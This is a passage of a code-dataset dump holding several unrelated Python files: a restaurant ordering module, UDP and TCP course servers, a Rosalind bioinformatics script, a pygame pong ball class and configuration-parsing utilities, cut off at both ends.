-----> R${produto[j].Preco}')\n venda[i].Valor= venda[i].Qtd * produto[j].Preco\n print(f'Preço total do produto -------> R${venda[i].Valor}')\n acum+= venda[i].Valor\n venda[i].Total= acum\n if produto[j].Cod_prod == venda[i].Cod_prod:\n produto[j].Qtd_estoque= produto[j].Qtd_estoque - venda[i].Qtd\n print('########################################')\n print(f'Valor total da venda ------> R${venda[i].Total}')\n print('########################################')\n print()\n\ndef pagamento(venda,produto): # Função de pagamento\n numcomanda=int(input('Nº da comanda: '))\n achou= False\n for i in range(len(venda)):\n if numcomanda == venda[i].Num_comanda:\n achou= True\n break\n if achou == False:\n print('Comanda não encontrada!!!')\n else:\n print()\n print(f'Nº comanda ---------> {venda[i].Num_comanda}')\n for i in range(len(venda)):\n print(f'Código do produto ------> {venda[i].Cod_prod}')\n print(f'Nome produto ---> {produto[i].Nome}')\n print(f'Qtd ------> {venda[i].Qtd}')\n print(f'Preço unitario -----> R${produto[i].Preco}')\n print(f'Preço total do produto -------> R${venda[i].Valor}')\n print('########################################')\n print(f'Valor total da venda ------> R${venda[i].Total}')\n print('########################################')\n venda[i].Forma_pag=input('Qual a forma de pagamento --> 1-Dinheiro, 2-Pix, 3-Cartão: ')\n if venda[i].Forma_pag == '1':\n dinheiro=float(input('Dinheiro: '))\n venda[i].Troco= dinheiro - venda[i].Total\n print(f'Forma de pagamento ------> {venda[i].Forma_pag} - Dinheiro')\n print(f'Troco ------> R${venda[i].Troco}')\n print()\n elif venda[i].Forma_pag == '2':\n print(f'Forma de pagamento ------> {venda[i].Forma_pag} - Pix')\n print('Chave Pix: 14589752')\n elif venda[i].Forma_pag == '3':\n cartao=input('1-Débito ou 2-Crédito: ')\n if cartao == '1' or cartao == '2':\n print(f'Forma de pagamento ------> {venda[i].Forma_pag} - Cartão')\n print('Insira o cartão ou Aproxime')\n else:\n print('Forma de pagamento inválida!!!')\n else:\n print('Forma de pagamento inválida!!!')\n print()\n\ndef excluir_compra(venda): # Função para excluir venda\n achou= False\n cod_comanda=int(input('Digite o código da comanda: '))\n for i in range(len(venda)):\n if cod_comanda == venda[i].Num_comanda:\n achou= True\n break\n if achou:\n del(venda[i])\n print('Venda Excluida!!!')\n else:\n print('Nº da comanda não encontrada!!!!')\n print()\n\ndef pesquisa_venda(venda): # Função para pesquisar venda\n vend=int(input('Digite o código da comanda: '))\n achou= False\n for i in range(len(venda)):\n if vend == venda[i].Num_comanda:\n achou= True\n break\n if achou == False:\n print('Comanda não encontrado!!!')\n else:\n print(f'Nº da comanda: {venda[i].Num_comanda}')\n for i in range(len(venda)):\n print(f'Cod do produto: {venda[i].Cod_prod}')\n print(f'Quantidade: {venda[i].Qtd}')\n print(f'Valor: R${venda[i].Valor}') \n print(f'Pagamento: {venda[i].Forma_pag}') \n print(f'Troco: R${venda[i].Troco}') \n print(f'Total da venda: R${venda[i].Total}')\n print()","repo_name":"Mari2213/Sistema-de-Restaurante","sub_path":"Restaurante/modulorestaurante.py","file_name":"modulorestaurante.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2992898778","text":"import socket\n#importa a bib socket\n\nMEU_IP = '' \n# Endereco IP do Servidor, '' = significa que ouvira em todas as interfaces\n\nMINHA_PORTA = 5000\n# Porta que o Servidor vai ouvir\n\ncliente1 = (\"127.0.0.1\", 7000)\ncliente2 = (\"127.0.0.1\", 12000) \n\nudp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n#socket.SOCK_DGRAM=usaremos UDP\n\nMEU_SERVIDOR = (MEU_IP, MINHA_PORTA) \nudp.bind(MEU_SERVIDOR)\n# faz o bind do ip e a porta para que possa comecar a ouvir\nprint(\"O servidor está ligado!\")\n\nwhile(True):\n Mensagem_Recebida, END_cliente = udp.recvfrom(1024)\n # socket.recvfrom(bufsize[, flags]) deve ser uma potencia de 2\n #Recebe dados do soquete = um par (string, endereco) onde string eh uma string representando os dados recebidos\n \n if(END_cliente[1] == 7000):\n print (\"Recebi =\", Mensagem_Recebida.decode(\"utf-8\"),\", do cliente\", END_cliente)\n # endereco eh o endereco do socket que enviou os dados.\n\n udp.sendto (Mensagem_Recebida, cliente2)\n print (\"Enviei =\", Mensagem_Recebida.decode(\"utf-8\"),\", para o cliente\", cliente2)\n else:\n print (\"Recebi =\", Mensagem_Recebida.decode(\"utf-8\"),\", do cliente\", END_cliente)\n # endereco eh o endereco do socket que enviou os dados.\n\n udp.sendto (Mensagem_Recebida, cliente1)\n print (\"Enviei =\", Mensagem_Recebida.decode(\"utf-8\"),\", para o cliente\", cliente1)\n \n if(Mensagem_Recebida.decode(\"utf-8\") == \"quit\"):\n print(\"Encerrando comunicação...\")\n break\n\nudp.close()\n#fim do socket","repo_name":"mizaelgoonfs/RedesComputadores","sub_path":"servidor_UDP.py","file_name":"servidor_UDP.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"37445595590","text":"import os\r\nfrom socket import *\r\nfrom threading import Thread\r\nimport sys, select\r\nfrom collections import defaultdict\r\nimport datetime\r\nimport time\r\nimport random\r\nimport json\r\n\r\n'''\r\nthe python version is python3\r\nread the arguments in the terminal, there are two arguments:\r\n1.the server's port\r\n2. the time to block the user to login in \r\n'''\r\nif len(sys.argv) != 3:\r\n print(\"\\n===== Error usage, python3 server.py SERVER_PORT Time_to_Block======\\n\")\r\n exit(0)\r\nserverHost = \"127.0.0.1\"\r\nserverPort = int(sys.argv[1])\r\nserverAddress = (serverHost, serverPort)\r\n\r\n# define socket for the server side and bind address\r\nserverSocket = socket(AF_INET, SOCK_STREAM)\r\nserverSocket.bind(serverAddress)\r\n\r\n\r\n# create a multi-thread server\r\nclass ClientThread(Thread):\r\n '''\r\n set the argument 'num_of_user' to count how many user are using in the server,and the list account to store the users' name, login_block store those user who is blocking because of the wrong password, the time is the time they can relogin.\r\n The __init__ function store the basic auguments in the server:\r\n login_failed_times used to count the times that user print the wrong password\r\n name sore the user name who is using\r\n '''\r\n num_of_user = 0\r\n accounts = []\r\n login_block = defaultdict(datetime.datetime)\r\n\r\n def __init__(self, clientAddress, clientSocket):\r\n Thread.__init__(self)\r\n self.clientAddress = clientAddress\r\n self.clientSocket = clientSocket\r\n self.login_failed_times = defaultdict(int)\r\n # self.login_block = defaultdict(datetime.datetime)\r\n self.name = ''\r\n self.block_time = int(sys.argv[2])\r\n print(\"===== New connection created for: \", clientAddress)\r\n self.clientAlive = True\r\n\r\n def run(self):\r\n message = ''\r\n\r\n while self.clientAlive:\r\n data = self.clientSocket.recv(1024)\r\n message = data.decode()\r\n\r\n # if the message from client is empty, the client would be off-line then set the client as offline (alive=Flase)\r\n if message == '':\r\n self.clientAlive = False\r\n print(\"===== the user disconnected - \", clientAddress)\r\n break\r\n\r\n '''\r\n if the client message include the relative request , it will run the function about it\r\n '''\r\n if 'login' in message:\r\n print(\"[recv] New login request\")\r\n self.process_login(message)\r\n\r\n elif \"EDG\" in message:\r\n print(\"[recv] New EDG request\")\r\n message = self.name\r\n self.clientSocket.send(message.encode())\r\n\r\n elif \"UED\" in message:\r\n print(f\"[recv] Edge device {self.name} issued UED command\")\r\n print(f'A data file is received from edge device {self.name}')\r\n try:\r\n req, id = message.split(' ')\r\n id = int(id)\r\n except ValueError:\r\n print(\"the fileID is not integers, you need to specify the parameter as integers\")\r\n except id == '':\r\n print('DTE command requires fileID and dataAmount as arguments.')\r\n else:\r\n message = self.name\r\n self.clientSocket.send(message.encode())\r\n\r\n elif \"uploadingdata\" in message:\r\n data = message.split(' ')\r\n fileid = data[1]\r\n data = data[2:]\r\n with open(f\"{self.name}-{fileid}.txt\", 'w+') as file:\r\n for item in data:\r\n file.write(item)\r\n message = f\"The file with ID of {fileid} has been received, upload-log.txt file has been updated\"\r\n print(message)\r\n self.clientSocket.send(message.encode())\r\n dataAmount = len(data)\r\n self.uploadlog(fileid, dataAmount)\r\n\r\n elif \"SCS\" in message:\r\n print(\"[recv] New SCS request\")\r\n try:\r\n req, id, operation = message.split(' ')\r\n id = int(id)\r\n except ValueError:\r\n message = \"the fileID are not integers, you need to specify the parameter as integers\"\r\n self.clientSocket.send(message.encode())\r\n except operation == '' or id == '':\r\n message = '“fileID is missing or fileID should be an integer'\r\n self.clientSocket.send(message.encode())\r\n except FileNotFoundError:\r\n message = \"fileID is missing or fileID should be an integer\"\r\n self.clientSocket.send(message.encode())\r\n else:\r\n print(f'Edge device {self.name} requested a computation operation on the file with ID of {id}')\r\n self.scs(id, operation)\r\n\r\n elif \"DTE\" in message:\r\n try:\r\n req, id = message.split(' ')\r\n id = int(id)\r\n except ValueError:\r\n print(\"the fileID is not integers, you need to specify the parameter as integers\")\r\n except id == '':\r\n print('DTE command requires fileID and dataAmount as arguments.')\r\n except os.path.exists(self.name + \"-\" + id + \".txt\") == False:\r\n message = \"the file is not exist in the server\"\r\n self.clientSocket.send(message.encode())\r\n else:\r\n print(f\"Edge device {self.name} issued DTE command, the file ID is {id}\")\r\n self.dte(id)\r\n\r\n elif message == \"AED\":\r\n message = ''\r\n print(f\"The edge device {self.name} issued AED command\")\r\n try:\r\n with open('edge_device_log.txt', 'r') as AED_file:\r\n data = AED_file.readlines()\r\n for item in data:\r\n no, timestamp, username, host, port = item.split('; ')\r\n if self.name == username:\r\n continue\r\n message += f'{username}; {host}; {port}; {timestamp}\\n'\r\n except FileNotFoundError:\r\n message = 'no other active edge devices'\r\n print(message)\r\n else:\r\n print(f'Return messages: {message}')\r\n if message=='':\r\n message='None'\r\n self.clientSocket.send(message.encode())\r\n\r\n elif message == \"OUT\":\r\n ClientThread.num_of_user-=1\r\n ClientThread.accounts.remove(self.name)\r\n print(f\"[recv] {self.name} exited the edge network\")\r\n self.clientAlive = False\r\n\r\n findout = False\r\n with open('edge_device_log.txt', 'r') as AED_file:\r\n data = AED_file.readlines()\r\n with open('edge_device_log.txt', 'w+') as AED_file:\r\n for item in data:\r\n if item=='\\n':\r\n continue\r\n no, timestamp, name, host, port = item.split(\"; \")\r\n no = int(no)\r\n if self.name == name:\r\n findout = True\r\n continue\r\n elif self.name != name and findout == False:\r\n AED_file.write(f\"{no}; {timestamp}; {name}; {host}; {port}\\n\")\r\n elif self.name != name and findout == True:\r\n AED_file.write(f\"{no - 1}; {timestamp}; {name}; {host}; {port}\\n\")\r\n message = f\"Bye, {self.name}!\"\r\n self.clientSocket.send(message.encode())\r\n\r\n elif \"UVF\" in message:\r\n findout = False\r\n reply_message = f'{self.name} False null null'\r\n req, devicename = message.split()\r\n with open('edge_device_log.txt', 'r') as file:\r\n data = file.readlines()\r\n for item in data:\r\n no, timestamp, name, host, port = item.split('; ')\r\n if name == devicename:\r\n findout = True\r\n reply_message = f'{self.name} {findout} {host} {port}' # str(findout)+' '+host+' '+port\r\n break\r\n\r\n self.clientSocket.send(reply_message.encode())\r\n\r\n # if the message not include any relative request, it will send the reply message that the request can not understand\r\n else:\r\n print(\"[recv] \" + message)\r\n print(\"[send] Cannot understand this message\")\r\n message = 'Cannot understand this message'\r\n self.clientSocket.send(message.encode())\r\n\r\n '''\r\n login relative function. Firstly, it will split the username and password from message, then it will check whether the user name is block, if not,it will check the user file to finish the login. \r\n every time the password is fault, it will do the record, when the fault time get the block times, it will prevent the user from logging in for ten seconds\r\n '''\r\n\r\n def process_login(self, message):\r\n action, username, password = message.split(\" \")\r\n # if the username is in block,then display and quit\r\n if username in ClientThread.login_block and datetime.datetime.now() < ClientThread.login_block[username]:\r\n sleeptime = (datetime.datetime.strptime(\r\n datetime.datetime.strftime(ClientThread.login_block[username], \"%Y/%m/%d %H:%M:%S\"),\r\n \"%Y/%m/%d %H:%M:%S\") - datetime.datetime.strptime(\r\n datetime.datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\"), \"%Y/%m/%d %H:%M:%S\")).seconds\r\n reply_message = f\"login fail, the user is block now,please wait for {sleeptime} sec.\"\r\n print('[send] ' + reply_message)\r\n self.clientSocket.send(reply_message.encode())\r\n time.sleep(sleeptime)\r\n return\r\n # open credentials to check\r\n with open('credentials.txt', 'r') as credentials_file:\r\n credentials_content = credentials_file.read()\r\n login_success = False\r\n\r\n for row in credentials_content.split('\\n'):\r\n try:\r\n row_username, row_password = row.split(' ')\r\n except:\r\n continue\r\n if username == row_username and password == row_password:\r\n self.name = username\r\n login_success = True\r\n ClientThread.accounts.append(self.name)\r\n\r\n if login_success:\r\n reply_message = 'admin login success.'\r\n ClientThread.num_of_user += 1\r\n now = datetime.datetime.now()\r\n timestamp = now.strftime(\"%d %B %Y %H:%M:%S\")\r\n with open(\"edge_device_log.txt\", 'a+') as devicelog_file:\r\n content = f\"{ClientThread.num_of_user}; {timestamp}; {self.name}; {serverHost}; {serverPort}\\n\"\r\n devicelog_file.write(content)\r\n else:\r\n self.login_failed_times[username] += 1\r\n reply_message = f'admin login failed. user:{username} failed {self.login_failed_times[username]} times. If fail {self.block_time} times, it will bolck.'\r\n print(reply_message)\r\n if self.login_failed_times[username] == self.block_time:\r\n reply_message += f'\\n failed time reach {self.login_failed_times[username]}, it will block 10 sec'\r\n self.login_failed_times[username] = 0\r\n ClientThread.login_block[username] = datetime.datetime.now() + datetime.timedelta(seconds=10)\r\n\r\n print('[send] ' + reply_message);\r\n self.clientSocket.send(reply_message.encode())\r\n\r\n # do the SCS calculation, if the operation is not exist, reply the operation request is not exist\r\n def scs(self, fileid, operation):\r\n if self.name == '':\r\n message = \"not login in\"\r\n else:\r\n try:\r\n with open(f\"{self.name}-{fileid}.txt\", 'r') as file:\r\n data = file.readlines()\r\n except FileNotFoundError:\r\n message = \"the file is not in server, so can not operation.\"\r\n else:\r\n\r\n for i in range(len(data)):\r\n data[i] = int(data[i])\r\n if operation == \"SUM\":\r\n message = f'{operation} computation has been made on edge device {self.name} data file (ID:{fileid}), the result is ' + str(\r\n sum(data))\r\n elif operation == \"AVERAGE\":\r\n message = f'{operation} computation has been made on edge device {self.name} data file (ID:{fileid}), the result is ' + (\r\n str(sum(data) / len(data)))\r\n elif operation == \"MAX\":\r\n message = f'{operation} computation has been made on edge device {self.name} data file (ID:{fileid}), the result is ' + str(\r\n max(data))\r\n elif operation == \"MIN\":\r\n message = f'{operation} computation has been made on edge device {self.name} data file (ID:{fileid}), the result is ' + str(\r\n min(data))\r\n else:\r\n message = 'The operation is not exist'\r\n print(f'Return message: {message}')\r\n self.clientSocket.send(message.encode())\r\n\r\n # delete the file in the server and update the delete_log file\r\n def dte(self, fileID):\r\n if self.name == '':\r\n message = \"not login in\"\r\n\r\n else:\r\n filename = f\"{self.name}-{fileID}.txt\"\r\n if os.path.exists(filename) == False:\r\n message = '“the file does not exist at the server side'\r\n else:\r\n with open(filename, 'r+') as file:\r\n data = file.readlines()\r\n datamat = len(data)\r\n\r\n now = datetime.datetime.now()\r\n timestamp = now.strftime(\"%d %B %Y %H:%M:%S\")\r\n content = f\"{self.name}; {timestamp}; {fileID}; {datamat}\\n\"\r\n with open(\"deletion_log.txt\", 'a') as delete_file:\r\n delete_file.write(content)\r\n os.remove(filename)\r\n\r\n message = f\"The file with ID of {fileID} from edge device {self.name} has been deleted, \\\r\n deletion log file has been updated\"\r\n print(f'Return message: {message}')\r\n\r\n self.clientSocket.send(message.encode())\r\n\r\n # the uploadlog function is relative to the UED.\r\n # after the file upload to sever, the server will run this function to update the upload_log file\r\n def uploadlog(self, fileID, dataAmount):\r\n dt_now = datetime.datetime.now().strftime(\"%d %B %Y %H:%M:%S\")\r\n with open(\"upload_log.txt\", 'a+') as file:\r\n content = f\"{self.name}; {dt_now}; {fileID}; {dataAmount}\\n\"\r\n file.write(content)\r\n\r\n\r\nprint(\"\\n===== Server is running =====\")\r\nprint(\"===== Waiting for connection request from clients...=====\")\r\n\r\nwhile True:\r\n serverSocket.listen()\r\n clientSockt, clientAddress = serverSocket.accept()\r\n clientThread = ClientThread(clientAddress, clientSockt)\r\n clientThread.start()\r\n","repo_name":"TUCN1022/COMP9331","sub_path":"9331/Ass/code/Server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":15617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"35119106047","text":"A_birth=0x7d0\r\nA_age=0x12\r\nB_age=0o22\r\nC_age=18\r\nprint(A_birth,',',A_age,',',B_age,',',C_age)\r\n\r\nprint(-2.5287e2)\r\n\r\ndef almost_equal():\r\n \"\"\"두 실수가 거의 같은지 검사하는 함수\"\"\"\r\n import math\r\n real1=float(input())\r\n real2=float(input())\r\n metric=abs(real1-real2)\r\n return metric\r\nbound=float(input())\r\nresult=almost_equal() tuple:\n return load_fasta(filepath)[1]\n\n\ndef trans_ratio(s1: str, s2: str) -> float:\n transitions = ['AG', 'GA', 'CT', 'TC']\n transversions = ['AC', 'CA', 'AT', 'TA', 'CG', 'GC', 'GT', 'TG']\n transition_count, transversion_count = 0, 0\n for i in range(0, len(s1)):\n temp = f'{s1[i]}{s2[i]}'\n if temp in transitions:\n transition_count += 1\n elif temp in transversions:\n transversion_count += 1\n return transition_count / transversion_count\n\n\nif __name__ == '__main__':\n path = \"datasets/031.tran.in\"\n s1, s2 = load_data(path)\n print(trans_ratio(s1, s2))\n","repo_name":"xwmp3/rosalind-python","sub_path":"bioinfomatics-stronghold/031.tran.py","file_name":"031.tran.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17127127130","text":"import pygame\nfrom pygame import Vector2\nfrom classes.player import Player\n\n\nclass Ball:\n pos: Vector2\n direction: Vector2\n velocity: float\n radius: int = 8\n border_x: int = 600\n border_y: int = 600\n\n # closest_point: Vector2 = Vector2(0, 0)\n # normal_vector: Vector2 = Vector2(1, -1)\n\n plrs_info = []\n\n screen = None\n\n def __init__(self, x: float, y: float, speed: float, screen=None) -> None:\n self.pos = Vector2(x, y)\n self.direction = Vector2(1, 0).normalize()\n self.velocity = speed\n self.screen = screen\n\n def move(self):\n self.pos += self.velocity * self.direction\n\n def draw(self, screen):\n pygame.draw.circle(screen, (255, 255, 255),\n (self.pos.x, self.pos.y), self.radius)\n\n def reflect(self, normal_vector):\n self.direction = self.direction.reflect(normal_vector)\n\n def get_closest_from_inside(plr):\n pass\n\n def collide_plr(self, plr: Player, plr_info: int):\n # box_mid = Vector2(plr.x + plr.size_x / 2, plr.y + plr.size_y / 2)\n is_left = False\n is_right = False\n is_inside = False\n\n if self.pos.x < plr.x:\n is_left = True\n elif self.pos.x > plr.x + plr.size_x:\n is_right = True\n\n if self.pos.y <= plr.y:\n # Pos above player\n if is_right: # Top right corner closest\n plr_info[\"closest_point\"] = Vector2(plr.x + plr.size_x, plr.y)\n plr_info[\"normal_vector\"] = (\n self.pos-plr_info[\"closest_point\"]).normalize()\n elif is_left: # Top left corner\n plr_info[\"closest_point\"] = Vector2(plr.x, plr.y)\n plr_info[\"normal_vector\"] = (\n self.pos-plr_info[\"closest_point\"]).normalize()\n else: # top\n plr_info[\"closest_point\"] = Vector2(self.pos.x, plr.y)\n plr_info[\"normal_vector\"] = Vector2(0, -1)\n elif self.pos.y >= plr.y + plr.size_y:\n # Pos below player\n if is_right: # Bottom right\n plr_info[\"closest_point\"] = Vector2(\n plr.x + plr.size_x, plr.y + plr.size_y)\n plr_info[\"normal_vector\"] = (\n self.pos-plr_info[\"closest_point\"]).normalize()\n elif is_left: # Bottom left\n plr_info[\"closest_point\"] = Vector2(plr.x, plr.y + plr.size_y)\n plr_info[\"normal_vector\"] = (\n self.pos-plr_info[\"closest_point\"]).normalize()\n else: # bottom\n plr_info[\"closest_point\"] = Vector2(\n self.pos.x, plr.y + plr.size_y)\n plr_info[\"normal_vector\"] = Vector2(0, 1)\n else:\n # Pos same level as player\n if is_right: # right\n plr_info[\"closest_point\"] = Vector2(\n plr.x + plr.size_x, self.pos.y)\n plr_info[\"normal_vector\"] = Vector2(1, 0)\n elif is_left: # left\n plr_info[\"closest_point\"] = Vector2(plr.x, self.pos.y)\n plr_info[\"normal_vector\"] = Vector2(-1, 0)\n else: # inside\n is_inside = True\n print(\"CODE RED\",\n plr_info[\"closest_point\"], plr_info[\"normal_vector\"])\n\n dist_sq = self.pos.distance_squared_to(plr_info[\"closest_point\"])\n\n if (dist_sq <= self.radius ** 2) or is_inside:\n # COLLISION\n self.pos = plr_info[\"closest_point\"] + \\\n self.radius * plr_info[\"normal_vector\"]\n self.reflect(plr_info[\"normal_vector\"])\n\n pygame.draw.line(self.screen, (255, 0, 0), (self.pos.x, self.pos.y),\n (plr_info[\"closest_point\"].x,\n plr_info[\"closest_point\"].y))\n\n def collide(self, players):\n # Walls\n # Top\n if self.pos.y - self.radius <= 0:\n self.pos.y = self.radius\n self.reflect(Vector2(0, 1))\n # print(\"Hit top\")\n # Right\n if self.pos.x + self.radius >= self.border_x:\n self.pos.x = self.border_x - self.radius\n self.reflect(Vector2(-1, 0))\n # print(\"Hit right\")\n # Bottom\n if self.pos.y + self.radius >= self.border_y:\n self.pos.y = self.border_y - self.radius\n self.reflect(Vector2(0, -1))\n # print(\"Hit bottom\")\n # Left\n if self.pos.x - self.radius <= 0:\n self.pos.x = self.radius\n self.reflect(Vector2(1, 0))\n # print(\"Hit left\")\n\n # Players\n if len(self.plrs_info) < len(players):\n self.plrs_info += [{\"closest_point\": Vector2(0, 0),\n \"normal_vector\": Vector2(0, 0)}] * \\\n (len(players) - len(self.plrs_info))\n\n for i, plr in enumerate(players):\n self.collide_plr(plr, self.plrs_info[i])\n","repo_name":"lelonS/pong-lol","sub_path":"classes/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":4959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71157265209","text":"import os\nimport yaml\n\nfrom ptp.utils.app_state import AppState\nfrom ptp.configuration.configuration_error import ConfigurationError\n\n\ndef display_globals(logger, globals_dict):\n \"\"\"\n Displays the global variables.\n\n :param logger: logger object\n\n :param globals_dict: Dictionary with globals\n \"\"\"\n # Create the string.\n global_str = 'Final global variables:\\n'\n global_str += '='*80 + '\\n'\n for key,value in globals_dict:\n global_str += \" {}: {}\\n\".format(key, value)\n global_str += '='*80 + '\\n'\n # Display.\n logger.info(global_str)\n\n\ndef display_parsing_results(logger, parsed_args, unparsed_args):\n \"\"\"\n Displays the properly & improperly parsed arguments (if any).\n\n :param logger: logger object\n\n :param parsed_args: Parsed command-line arguments\n\n :param unparsed_args: Unparsed command-line arguments\n\n \"\"\"\n # Log the parsed flags.\n flags_str = 'Properly parsed command line arguments: \\n'\n flags_str += '='*80 + '\\n'\n for arg in vars(parsed_args): \n flags_str += \" {}= {} \\n\".format(arg, getattr(parsed_args, arg))\n flags_str += '='*80 + '\\n'\n logger.info(flags_str)\n\n # Log the unparsed flags if any.\n if unparsed_args:\n flags_str = 'Invalid command line arguments: \\n'\n flags_str += '='*80 + '\\n'\n for arg in unparsed_args: \n flags_str += \" {} \\n\".format(arg)\n flags_str += '='*80 + '\\n'\n logger.warning(flags_str)\n\n\ndef export_experiment_configuration_to_yml(logger, log_dir, filename, config_interface_obj, user_confirm):\n \"\"\"\n Dumps the configuration to ``yaml`` file.\n\n :param logger: logger object\n\n :param log_dir: Directory used to host log files (such as the collected statistics).\n :type log_dir: str\n\n :param filename: Name of the ``yaml`` file to write to.\n :type filename: str\n\n :param config_interface_obj: Configuration interface object.\n\n :param user_confirm: Whether to request user confirmation.\n :type user_confirm: bool\n\n \"\"\"\n # -> At this point, all configuration for experiment is complete.\n\n # Log the resulting training configuration.\n conf_str = 'Final parameter registry configuration:\\n'\n conf_str += '='*80 + '\\n'\n conf_str += yaml.safe_dump(config_interface_obj.to_dict(), default_flow_style=False)\n conf_str += '='*80 + '\\n'\n \n logger.info(conf_str)\n\n # Save the resulting configuration into a .yaml settings file, under log_dir\n with open(log_dir + filename, 'w') as yaml_backup_file:\n yaml.dump(config_interface_obj.to_dict(), yaml_backup_file, default_flow_style=False)\n\n # Ask for confirmation - optional.\n if user_confirm:\n try:\n input('Press to confirm and start the experiment\\n')\n except KeyboardInterrupt:\n exit(0) \n\n\ndef load_class_default_config_file(class_type):\n \"\"\"\n Function loads default configuration from the default config file associated with the given class type and adds it to parameter registry.\n\n :param class_type: Class type of a given object.\n\n :raturn: Loaded default configuration.\n \"\"\"\n \n # Extract path to default config.\n module = class_type.__module__.replace(\".\",\"/\")\n rel_path = module[module.find(\"ptp\")+4:]\n # Build the abs path to the default config file of a given component/worker.\n abs_default_config = os.path.join(AppState().absolute_config_path, \"default\", rel_path) + \".yml\"\n\n # Check if file exists.\n if not os.path.isfile(abs_default_config):\n print(\"ERROR: The default configuration file '{}' for '{}' does not exist\".format(abs_default_config, class_type.__module__))\n exit(-1)\n\n try:\n # Open file and get parameter dictionary.\n with open(abs_default_config, 'r') as stream:\n param_dict = yaml.safe_load(stream)\n\n # Return default parameters so they can be added to the global registry.\n if param_dict is None:\n print(\"WARNING: The default configuration file '{}' is empty!\".format(abs_default_config))\n return {}\n else:\n return param_dict\n\n except yaml.YAMLError as e:\n print(\"ERROR: Couldn't properly parse the '{}' default configuration file. YAML error:\\n {}\".format(abs_default_config, e))\n exit(-2)\n\n\ndef recurrent_config_parse(configs_to_parse: list, configs_parsed: list, abs_config_path: str):\n \"\"\"\n Parses names of configuration files in a recursive manner, i.e. \\\n by looking for ``default_config`` sections and trying to load and parse those \\\n files one by one.\n\n :param configs_to_parse: List containing names of configuration files (with paths).\n :type configs_to_parse: list\n\n :param configs_parsed: Configurations that were already parsed (so we won't parse them many times).\n :type configs_parsed: list\n\n :param abs_config_path: Absolute path to ``config`` directory.\n\n :return: list of parsed configuration files.\n\n \"\"\"\n # Terminal condition.\n while len(configs_to_parse) > 0:\n\n # Get config.\n config = configs_to_parse.pop(0)\n\n # Skip empty names (after lose comas).\n if config == '':\n continue\n print(\"Info: Parsing the {} configuration file\".format(config))\n\n # Check if it was already loaded.\n if config in configs_parsed:\n print('Warning: Configuration file {} already parsed - skipping'.format(config))\n continue\n\n # Check if file exists.\n if not os.path.isfile(config):\n print('Error: Configuration file {} does not exist'.format(config))\n exit(-1)\n\n try:\n # Open file and get parameter dictionary.\n with open(config, 'r') as stream:\n param_dict = yaml.safe_load(stream)\n except yaml.YAMLError as e:\n print(\"Error: Couldn't properly parse the {} configuration file\".format(config))\n print('yaml.YAMLERROR:', e)\n exit(-1)\n\n # Remember that we loaded that config.\n configs_parsed.append(config)\n\n # Check if there are any default configs to load.\n if 'default_configs' in param_dict:\n default_configs_to_parse = param_dict['default_configs'].replace(\" \", \"\").split(',')\n # If there are - expand them to absolute paths.\n abs_default_configs_to_parse = [os.path.join(abs_config_path,config) for config in default_configs_to_parse]\n # Recursion!\n configs_parsed = recurrent_config_parse(abs_default_configs_to_parse, configs_parsed, abs_config_path)\n\n # Done, return list of loaded configs.\n return configs_parsed\n\n\ndef reverse_order_config_load(config_interface_obj, configs_to_load):\n \"\"\"\n Loads configuration files in reversed order.\n\n :param config_interface_obj: Configuration interface object.\n\n :param configs_to_load: list of configuration files to load (with absolute paths)\n \"\"\"\n for config in reversed(configs_to_load):\n # Load config from YAML file.\n config_interface_obj.add_config_params_from_yaml(config)\n print('Info: Loaded configuration from file {}'.format(config))\n\n\ndef get_value_list_from_dictionary(key, parameter_dict, accepted_values = []):\n \"\"\"\n Parses parameter values retrieved from a given parameter dictionary using key.\n Optionally, checks is all values are accepted.\n\n :param key: Key of the parameter.\n :param parameter_dict: Dictionary containing given key (e.g. config or globals)\n :param accepted_values: List of accepted values (DEFAULT: [])\n\n :return: List of parsed values\n \"\"\"\n parameter = parameter_dict[key]\n # Preprocess parameter value.\n if (type(parameter) == str):\n if parameter == '':\n # Return empty list.\n return []\n else:\n # Process and split.\n values = parameter.replace(\" \",\"\").split(\",\")\n else:\n values = parameter # list\n assert type(values) == list, \"Parameter value must be a list\"\n\n # Test values one by one.\n if len(accepted_values) > 0:\n for value in values:\n if value not in accepted_values:\n raise ConfigurationError(\"One of the values in '{}' is invalid (current: '{}', accepted: {})\".format(key, value, accepted_values))\n\n # Return list.\n return values\n\ndef get_value_from_dictionary(key, parameter_dict, accepted_values = []):\n \"\"\"\n Parses value of the parameter retrieved from a given parameter dictionary using key.\n Optionally, checks is the values is one of the accepted values.\n\n :param key: Key of the parameter.\n :param parameter_dict: Dictionary containing given key (e.g. config or globals)\n :param accepted_values: List of accepted values (DEFAULT: [])\n\n :return: List of parsed values\n \"\"\"\n value = parameter_dict[key]\n assert type(value) == str, \"Parameter value must be a string\"\n # Preprocess parameter value.\n if value == '':\n return None\n\n # Test values one by one.\n if len(accepted_values) > 0:\n if value not in accepted_values:\n raise ConfigurationError(\"One of the values in '{}' is invalid (current: '{}', accepted: {})\".format(key, value, accepted_values))\n\n # Return value.\n return value\n","repo_name":"IBM/pytorchpipe","sub_path":"ptp/configuration/config_parsing.py","file_name":"config_parsing.py","file_ext":"py","file_size_in_byte":9308,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"77"} +{"seq_id":"11919001987","text":"#gauss factorial of a number n is defined as the product of all positive numbers <= n that are relatively prime to n\r\n\r\n#project euler problem\r\n#G(n) =\r\n#n\r\n#pi notation -> gauss factorial(i)\r\n#i=1\r\n\r\n\r\n\r\ndef CheckIfPositivePrime(value):\r\n if value <= 0:\r\n return False\r\n if value == 1 or value == 2 or value == 3:\r\n return True\r\n else:\r\n if value % 2 == 0 or value % 3 == 0:\r\n return False\r\n else:\r\n return True\r\n\r\n\r\n\r\ndef FindFactors(value):\r\n if value <= 